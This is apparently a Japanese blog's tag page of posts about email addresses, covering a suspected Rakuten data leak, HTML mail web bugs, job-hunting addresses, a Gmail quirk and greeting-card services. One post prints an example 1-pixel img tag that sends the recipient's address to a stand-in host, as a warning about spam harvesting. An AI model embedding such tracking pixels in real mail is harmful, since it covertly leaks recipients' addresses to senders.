タグ「メールアドレス」が付けられているエントリー

楽天市場から個人情報がスパム業者に流出してるのは間違いなさそうな予感

| 楽天市場から個人情報がスパム業者に流出してるのは間違いなさそうな予感

なので、メールアドレスは現時点では楽天市場に店舗を出店しているショップにはわからないようになっているはずであり、もしもショップが楽天市場ユーザーのメールアドレスを何らかの方法で知ることができるのであれば、もうそれだけで十分に大問題なわけです。

楽天市場から個人情報がスパム業者に流出か、実名の記載された迷惑メールが楽天でしか使っていないメールアドレスに届き始める - GIGAZINE

なるほどね.これはザルでした.店舗が使うのはどうなっているのか分かりませんが,専用のソフトみたいなのでメールを送れば,注文者のメールアドレスは分からなくても送れるようになっているようです.楽天のショップから届いたメールを一部伏せて載せますね.

Delivered-To: @gmail.com
Received: by 10.220.85.210 with SMTP id p18cs316855vcl;
        Wed, 13 May 2009 08:50:13 -0700 (PDT)
Received: by 10.150.153.2 with SMTP id a2mr1396018ybe.169.1242229812796;
        Wed, 13 May 2009 08:50:12 -0700 (PDT)
Return-Path: <@nifty.com>
Received: from mxtr06c.rakuten.co.jp (mxtr06c.rakuten.co.jp [202.72.52.243])
        by mx.google.com with ESMTP id 26si326091gxk.21.2009.05.13.08.50.12;
        Wed, 13 May 2009 08:50:12 -0700 (PDT)
Received-SPF: softfail (google.com: domain of transitioning @nifty.com does not designate 202.72.52.243 as permitted sender) client-ip=202.72.52.243;
Authentication-Results: mx.google.com; spf=softfail (google.com: domain of transitioning @nifty.com does not designate 202.72.52.243 as permitted sender) smtp.mail=@nifty.com
Received: from armsrb108c.ap.rakuten.co.jp (armsrb108c.ap.rakuten.co.jp [172.28.246.131])
	by mxtr06c.rakuten.co.jp (Rakuten MGw 1.3.6) with ESMTP id 71FC0F42C9;
	Thu, 14 May 2009 00:50:11 +0900 (JST)
Received: from armsrb108c (localhost [127.0.0.1])
	by armsrb108c.ap.rakuten.co.jp (8.13.1/8.13.1) with ESMTP id n4DFoBc0019064;
	Thu, 14 May 2009 00:50:11 +0900
Date: Thu, 14 May 2009 00:50:11 +0900 (JST)
From:  <@nifty.com>
To: @gmail.com
Cc: @nifty.com
Message-ID: <136026988.43371242229811384.JavaMail.javamailuser@localhost>
Subject: 
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-2022-jp
Content-Transfer-Encoding: 7bit

な.CCが付けられちゃったら,すぐに分かっちゃうじゃないですかー.だめじゃーん!

研究室でスパムメールの話題になって「えっ!?」って話になったので,折角だから広く世に知らしめておく.スパムメールはうっかり開くだけでも,危険(有効なメアドが収集される的な意味で)ですからー!残念っ!

例えば,こんなメール.

081217_gmail01.png

日経ビジネスオンラインのメールですが,別に悪意があるわけではありません.たまたま参考例に良かったから出してみただけです.他意はない.ボクが使っているメールクライアントはGmailなんですが,画像が入っているメールは画像非表示で表示されます.これは何故か.

  1. 低速モバイル環境で従量制課金かもしれないから
  2. エロ画像が表示されて社内コンプライアンス的にヤバメだとヤバイから
  3. その他

こんな理由が挙げられるかと思いますが,どれも理にかなっていると思いますが,なんとなく3かなって.それは何故か.何故なのか.上の図にある「次の画像を表示」をクリックすると,画像が表示されるようになります.

081217_gmail02.png

こんな感じになります.ほうほう.画像によるリンクですね.別に,テキストアンカーでもいいと思うんですが・・・.それはそれとして,じゃぁ,これはどうやって表示されているの?メールに画像ファイルが添付されてくるの?ノンノンノン.ヘッダ情報を見てみましょう.関係ありそうな場所を抜粋.

081217_gmail03.png

普通にサーバからhttpで画像を読み込んでます.つまり,さっきの「次の画像を表示」ってのはそういう意味なんです.「外部とアクセスして画像ファイル(だと思われるもの)を取得するけど良い系?」って尋ねられているんです.えぇ.これはまずいですね.まずいですよね.いや,日経ビジネスオンラインがまずいわけではなく,これは悪用できますよねって話.

例えば,imgタグが次のように書かれていたら,どうなるだろうか?

<img src="http://example.com/?hoge@example.net" height="1" width="1" />

ほら!まずいでしょ?このメールはhoge@example.net宛に送られてきたとすれば,URLパラメータとして,hoge@example.netが送信されてしまうよ.「ぇ?だってこれ,画像ファイルじゃないじゃん!スクリプトじゃん!」って思った人は賢い.賢くてやられる.PHP+GDでimgタグのsrcにPHPを指定して画像を得る方法があるんです.クール!

ということは, 上の例ではWebバグっぽく1ドットの例を挙げましたが,実際は何だってよくって,「ご当選おめでとうございます」だっていいんですよ.要は,送りつけたメールに書かれているコードを使って,サーバにアクセスさせられさえすればok.あ.ちなみに「Webバグ」って,不良品やら欠陥を示すbugではなく,虫って意味の方のbugです.別に,ブラウザやメールクライアントの脆弱性じゃないです.あしからず.

でもでも,こういう説明をしちゃうと「Webバグって悪いやつだ!」って思われるかもしれませんが,いわゆるアクセス解析にも使われますし,閲覧者数を確認するのにも使われます.

081217_nikkeibp01.png

つまり,こういう使われ方ですね.わかります.これは日経ビジネスオンラインの例です(ぁれ?.

ちなみに,開封確認を使う方法もあるので,こっちも注意.まさか,常に送信なんてことはないですよねぇ・・・.

というわけで,これらの方法によって,無差別にメールを送りつけて,その中から有効なメールアドレスを収集することができます.そんな理由もあるので,ボクはHTMLメールは好きじゃないです.必要があれば,それはそれで別に仕方がないと思いますが,全く持ってプレーンテキストでも良さそうなのに,HTMLメールだと萎えます.OEにありがちなので,何とかして下さいorz.

まとめ:
迷惑メールは閲覧するだけでも危険(有効なメアドが収集される的な意味で)な場合があることを理解しておく.その上で,迷惑メールを閲覧して,ニヤニヤしつつ,楽しむ.enjoy!

誤解と批判を恐れずに,ハッキリと申し上げよう.就活時のメールアドレスにyahooやgmailやmsnなどの誰もが取得可能なフリーメールアドレスを使うのは,先方に対して失礼である.マイナビなんて信じちゃダメだ

メールアドレスというのはネット上において,電子メールという手段を用いて連絡を取るために必要となる情報である.それは言わば,顔だろうか.スパムメールの問題が未だに解決されないが,固定のアドレスを使えるといいと思う.ずっと使い続けるということは,使い捨てではないという信頼感が生まれていくだろう.

さて,何故に就活時にフリーメールアドレスを使うのだろうか.オレは就活らしい就活をしたことがないので,就活らしい就活をしている学生数名に訊いたことがある.返事は色々だ.「メインのアドレスでいつもチェックしているから」「学校のメールアドレスは転送ができず,携帯から見れない」「リクナビから毎日すごい量のメールがくるから」「就活の時だけ使うから」などなど.どれもこれも,局所的に見れば納得できる理由である.だが,それだけだ.特に,就活専用のメールアドレスをフリーメールアドレスで取ろうと思っている人は自分の行いを顧みて欲しい.就活が終わればそのメールアドレスはどうなるのか?捨てられるのか?その捨てられるアドレスを使ってやり取りというか,関係を作ってきた就活先の企業を切るということだろうか.彼氏と別れたからメアド替えるような感覚で,社会に触れない方がいいと思う.社会人になる自覚を持った方がいいと思う.

オレは予てより,学校から割り当てられるメールアドレスを使うべきだと主張してきた.もちろん,今でも変わらない.メールアドレスは@を挟んで,左側はアカウント名,右側はドメイン名となっている.学校から割り当てられるということは,ドメイン名が学校所有のものとなり,そのメールアドレスを行使するということは,その大学所属であることを確かに示すことに他ならない.だから,自分の大学から割り当てられるメールアドレスを使うということは,自分の所属を包み隠さず主張するということに他ならない.とすれば,いかなる理由においても,大学のメールアドレスを利用することなく就職活動を行われることは,大学にとっては損ではないのか.穿った見方をすれば,学生は大学を信用していないと思われかねない.被害妄想だ.

もう少し現実味のある話をしよう.企業によってはフリーメールアドレスをスパムフィルタ等でブロックしていることがあるらしい.msnやyahooやgmailなどの有名なフリーメールアドレスを発信源としたスパムが流通することから,ベイジアンフィルタなどによって,yahoo全体やmsn全体が受信拒否される可能性がある.これは不味かろう.そんな状況にはなりたくなかろう.もし,そうなってしまった時に,履歴書に書いたメールアドレスと異なるメールアドレスからメールを送ろうものなら,信頼性の欠片もあったものではない.一貫性が見当たらない.

しかしながら,大学から割り当てられるメールアドレスが事実上使い物にならない場合もある.前所属校のメールサーバは酷かった.特にリプレース後は送受信の遅延が数時間~1日に及ぶことがあったり,gmailからのメールをグレイフィルタという不思議な方法で受信拒否してくれた.しかも,送信エラーは数日後に返ってくるので,急ぎの連絡には全く使えない(そもそも電子メールは確実に届く保証がないのだが).もしくは,メールボックスのサイズが100MB程度ということもあるだろうし,携帯電話からは閲覧不能(Webメールのインタフェイスがない)だったり,転送ができないなど,色々な問題はある.確かにある.だから使えないといわれれば,それは大学の情報課がどこまで対応するかにかかってくるだろう.これについては色々な事情があるので,強くいえない.だが,使って貰えないメールサービスを提供することに意味があるのだろうか?卒業しても同じメールアドレスを使い続けたいと思わせる心意気はないのか.早稲田のように

だいたい結論が見えてきたと思うが,大学のドメインを利用したメールアドレスを利用できさえすればいい.となれば,サブドメインを取得可能と思われる学部,学科,研究室という単位ででも,独自にメールサーバを立てて,学生に提供することが学生の就活を支援する1つになり得るのではないだろうか.例えば,修士ならば研究室に属しているだろうから,各研究室がメールサーバを準備し,各学生にメールアドレスを割り当てればいいと思う.問題になるのは学部生だ.学部生は3年次に就職活動を始めるのだろうから,その時点で研究室に配属されていない可能性が高い.となると,研究室よりも上位の学科や学部がその役目を果たすことになるのだろうか.今の時代,メールでの連絡は普通だろうし,大学のドメインを含んだメールアドレスを使って貰えるように努力するのは大事なことではないかと思う.

さて,ここらで真面目な話(ぇ)をしたいと思う.これに触発されて,ただ単純にメールサーバを立てて頂いても,とても困る.例えば,全ての大学で全ての研究室がメールサーバを立てたとしよう.一体,そのうちのどれだけが,スパム対策やウィルス対策,そしてセキュリティ全般を考慮した運用ができるだろうか.メールサーバは簡単なものではなく,サーバ管理者歴6年目のオレでも躊躇する.というか,できることならやりたくない.辞めたい.勘弁して欲しい.

ではどうするか.外注だよ外注.小規模な単位ではGoogle Appsが利用可能です.オレも利用しました.Google Appsの良いところは,GmailやGoogleカレンダーなどのGoogleのWebサービスを利用できること,ドメインさえ所有していればサーバを準備する必要はないこと,あたりだろうか.申込手順は簡単で,ドメインの所有権を主張するために,ドメインでアクセス可能なWebサーバに所定のファイルを置く方法,DNSレコードを書き換える方法がある.前者の方法はWebサーバが必要になるのでサーバを準備する必要があるが,後者の方法はサーバを準備しなくても,ドメインを管理している上位管轄にお願いするだけでよい.なんたる便利さ!

小規模な単位では使えないような気がするが,YahooMSNにも同等のサービスがある.色々な大学が利用を始めているらしい.という情報はこれでも大学職員のブログで手に入る.色々な大学の情報システムが垣間見られて面白い.

まとめ:
就活時のメールアドレスには所属を示すことができるメールアドレスを使おうよ.大学などは学生に所属を示すことができるメールアドレスを使って貰えるように努力したい.

そんな理由で,研究室にはGoogle Appsを導入したので,みんなが利用してくれるといいなぁ,とここでつぶやいてみるテスト.

Gmailでメールを作成したり,返信したりして,ToやCCやBCCにアドレスを入力する際に,1文字でも入力すると,候補がずらずらっとでますよね?具体的に言えば,以下のような感じ.

080916_gmail01.png

それがですね,何故なにどうしてか,候補が出ないときがあるんです.具体的に言えば,以下のような感じ.

080916_gmail02.png

画像ははめ込み合成ではありません.このトラブルには比較的悩まされ続けてきたんですが,やっと原因がわかりました.オレ,結構がんばったぞ.

原因:
辞書のオンオフ.

再現:
辞書オンの状態で宛先欄に移動し,辞書をオフにしてアドレスを打ち込んでも,候補が出てこない.

対策:
別の場所で辞書オフにしてから,宛先欄に移動する.宛先欄で辞書オフにしてしまった場合,別の欄(例えば件名)などに移動してから,辞書オフの状態のまま宛先欄に移動する.

200810292052追記:
いつの間にやら直っていた.辞書のオンオフしても関係ないです.素晴らしい!思ったことは書いておくもんだ!

もちろん,皮肉です.

080408_mail_1.png

ほらほら!ゲットできたよ!でもでも,当然ながら,

以下の日時で任意メールアドレス取得サービスを開始いたします。->現在不具合が発生しており、任意メールアドレス取得ができません。(3月24日)
※サービス再開について4月16日にお知らせする予定です。(3月28日)

任意メールアドレスサービス開始について

と書いてあるので,送ったメールはどこかに消えてしまいました.闇の中ー.でもでも,

080408_mail_2.png

もう変更できない件www.使わねーよ!うわーん!

200804090019追記:
送ったメールは「アカウントのメールボックスがいっぱいで送れなかったよ!」で返ってきました.んなわきゃない.っていうか,このメールサーバは学内にないね.データセンタにあると見た.だから,メンテナンスがノラリクラリなんだな.

楽天グリーティングはダメで,Yahoo!グリーティングもダメと記事を立て続けたわけだが,苦情を出しまくったことが功を奏したのか,楽天グリーティングからハイフンを含むメールに送信が可能になった模様.いつからかは不明.

071231_greeting02.png

これは素晴らしい!ナイス対応だ.未だにYahoo!グリーティングはダメだが.今年も楽天グリーティングを利用させていただきます!アーサム楽天!

なお,なんで楽天グリーティングを試したかといいますと,楽天もダメ,Yahooもダメで,他のグリメサービスは今ひとつだし,絵文字互換をフル活用して自力で作ろうかと始めたところ・・・ドコモの変換出来無さ加減は異常.「ネズミ」すら送れないとは・・・干支も表示できないなんてorz.ダメ元で試してみるか!っていう理由です.楽できるなら,楽できた方が幸せです.

後日談になるが,昨日Yahooに送ったガッカリメールに対する返答があった.

関連:
ヘタレ系DのBlog: 携帯の絵文字変換は中途半端

200712312045追記:
楽天グリーティングのお陰で年賀メールの手配は完了しました.昨年の資産が使えるって素晴らしい!楽天GJだ!

楽天グリーティングでハイフンで始まるメールアドレスに送信できないことは既にお伝えしたとおりであって,何度も申し上げますが,ハイフンで始まるメールアドレスはRFC違反ではないのです.何度か「ちゃんと設定してよ.オレが困るでしょ!」と苦情を送っているのだが,未だに対処してくれない.困っているのはオレだけなのだろうか?

そんなオレが少数派過ぎるのではないかと追い打ちをかける事件が発生した.それはYahoo!グリーティングだ.どうもグリーティングメールサービスは数が少なくなっているようで,大手は楽天とYahooしか残っていないようだ.そして,楽天が使えないとなれば,Yahooしか選択肢がないので,試してみたわけだ.結果はこちら.

071230_greeting.png

ガッカリだよ!ガッカリしすぎたので,お問い合わせからオレのガッカリ具合を切実と送ってみた.「楽天と同等ですね」って.

そんなにハイフンから始まるメールアドレスって特殊ですか?

200712311616追記:
Yahooに送ったガッカリメールに対する返答があった.年末なのに即答だ.テンプレ返信か?返答内容の一部を以下に引用する.

メールアドレスに記号などが混ざっている場合、Yahoo!グリーティングではご利用になれない場合がございます。誠に恐縮ですが、何卒ご了承くださいますようお願いいたします。

お客様のご意見は、今後のサービス向上・改善の検討課題とさせていただきますので、また何かございましたらお気軽にご意見・ご感想をお寄せください。

もうね.そういうことはFAQに書いておけばいいと思う.送れないなら送れないと堂々と書いておけばいいと思う.それがサービスとしての判断材料になるのだから.

プロフィール

e-m@il @ddress